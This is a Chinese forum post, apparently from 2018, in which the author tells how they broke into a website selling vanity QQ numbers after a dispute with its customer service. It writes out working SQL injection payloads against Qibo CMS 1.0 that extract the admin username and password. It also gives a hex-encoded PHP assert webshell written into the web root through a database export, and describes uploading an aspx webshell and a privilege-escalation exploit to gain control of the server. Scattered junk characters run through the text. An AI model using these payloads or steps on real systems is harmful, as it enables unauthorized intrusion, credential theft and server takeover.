|
, q6 Y/ U# h- ^' `+ w
o/ `: [- H& O$ b+ p
3 ` ` P: Y2 Y# |
: w: f6 {2 ]2 @3 M# b* b9 d 一、踩点寻找漏洞
$ h- X. K' s0 a, A, ~3 s
闲来无事,在各个QQ靓号群求买5位QQ,寻问半天无果就在百度搜索5位QQ扫号找到“目标”www.qq.com,打开一看就一静态页面,哇好多靓号啊,90000000,300000,98888888,199999999,哇这么多靓号,然后我去联系客服,要求客服登录账户看看,此处略去100字,然后开始撕逼,然后就有了下文。。。。
, ]. S3 x" o. \1 |4 B( z# u随手拿御剑扫了一下好多php页面,随手加一个member发现是齐博1.0的内容管理系统,然后就去百度找漏洞,什么后门漏洞一一做测试都无果,找来找去找到一个全版本的注入漏洞,详细利用方法如下:
9 K/ f5 V, |( k5 i
先注册一个用户,记住注册时候的邮箱以uid号,
7 J9 q1 g3 x$ q! \
2 g, G/ }4 \5 M3 ]- c( t) P2 c
: \" [7 }2 ?1 ~9 m6 { I然后我们打开火狐浏览器简单构造一下,http://www.qq.com/member/userinfo.php?job=edit&step=2,发送数据包如下:
7 `0 i& \; n5 `2 n3 w6 V
% f$ H: f. @- @; I* p
truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select user()) where uid=3%23
* L- P5 H3 W& _/ p. C* W) o* m2 |
这里的email和uid一定要和注册的账号所吻合,然后访问,提示成功以后查看用户资料如图:
- S* |, t) |5 Y, P! R
5 \5 G! J+ u Z! a
确实存在注入漏洞,那么我们来注入一下管理账号密码,修改数据包如:truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,address=(select concat(username,0x2e,password) from qb_members limit 1) where uid=3%23
4 _$ E5 I$ s: P ?6 B: J* M! P
$ t+ y3 ]7 y$ u& n
0 v/ z$ Z# P" t/ Z! f6 |9 t解密进后台如图:
; U" U o' G; u3 q1 w: x
& G) A9 G) Q4 x7 y
/ h" c1 H3 N( z* l# g
1 `1 B9 |9 `" K9 k% _二、后台getwebshell
7 g( ~) V! N0 H进了后台,以前齐博有个后台getwebshell漏洞,在系统功能- 单篇文章独立页面管理-增加页面添加个webshell,如图:
& k9 Z1 p+ a8 M# z5 u% E3 E/ @
! @. o! _/ O* S) O2 Q8 y
# S9 r6 t7 |* |2 o/ W( e; \8 `
, K# P" I; \) B然后点确定,添加提示
1 B4 X) I. k5 S
/ L H1 Q+ B' X; J" O
1 |2 S. Y% r/ \& z* o
& m5 k; p) N, e& _$ \2 @
由于是ii6.0的所以我们可以考虑一下解析漏洞,我们再来如图:
- L( h) j) H: B/ P
- R: Z& M) E/ `! k+ m5 c+ q: `7 A
" o) m* u: O! A5 ?+ w& |* p$ v
改静态页面为help.php;.htm,然后我们发现访问help.php;.htm是404(写文章之前测试是可以成功写入的),欧巴,他么的我们再想想别的办法,抽了一支烟,我们继续,他这里不是有个服务器信息、数据库工具吗,之前我们测试当前用户名是root,那么我们完全可以考虑利用服务器信息、数据库工具来导入一句话,屌屌的妈妈的,我们来演示一下,先把一句话hex编码一下,<?php assert($_POST[sb]);?>编码以后是:0x3C3F7068702061737365727428245F504F53545B73625D293B3F3EDA网站目录是D:\wwwroot\qq.com\admin\,注意我们要把\改成/,否则不成功D:/wwwroot/qq.com/admin/,下面我们来导一下
# O6 I0 B. k% J4 S: @* p! L4 I如图:
$ p$ d: r5 w: G- C4 {
6 D5 G" x( _# F/ Q
! [. A0 \4 c: i1 h8 q
1 U5 ^! g0 e2 R, \
之前已经测试过了用普通菜刀无法连接,测试用过狗菜刀也无法连接,用xiese打开
$ C6 M- H& I. p+ w3 u
1 G. _+ i. o6 Q# z$ g2 C
. W: E/ l8 h. V0 c: F- C: z/ k
8 N" m7 K" o2 w }$ d. o; x5 w5 L
三、提权进服务器
+ |, a3 [; k' H% x6 |% C经测试xise下一句话只有在admin目录下有权限浏览,且不能执行命令,庆幸的是支持aspx,那么我们就上一个aspx大马,然后执行命令提示拒绝访问,哈哈在c:\windows\temp下上传cmd.exe然后执行systeminfo,发现打了400多补丁,如图:
- S( ^& ^4 m( R7 y
# n$ t6 ? X# W, `% U1 q6 e
7 j( U: \( r4 j; ~6 B
啧啧啧,这么多补丁,我都没去试试今年和2014年放出来的exp,而且是在咱们大00下载了一个变异pr,然后上传提权如图:
$ I" t9 a: N0 _+ m( u0 W
% U p' r8 z! u% T& l4 I
1 W( y" W" g8 d) d7 R5 p然后登陆服务器如图:
' B% r, f1 I, D* G3 Q8 ~9 G' z* R+ i& P
- e( X, _5 r. J: P
 4 V# o: a6 s/ \! A3 T
1 G& ]6 D; x# F8 t7 `, S
% z: |5 T$ `8 d+ J6 U1 T# A
' Q% `4 g m7 a) ?, ~
难怪普通刀连接不上,原来是有狗。
) A" P* X$ N9 G5 z) z
4 D! m& S" L# }3 a; f
' s. y. v! F+ Y6 l( `
7 R; t4 p- g3 \/ C3 X; R9 ] + D: c/ R3 _3 u+ ~
+ @6 D1 Z; Q5 h4 a
& Q0 y4 N9 c* w7 E
| 
发表于 2018-10-20 20:08:47
收藏
支持
反对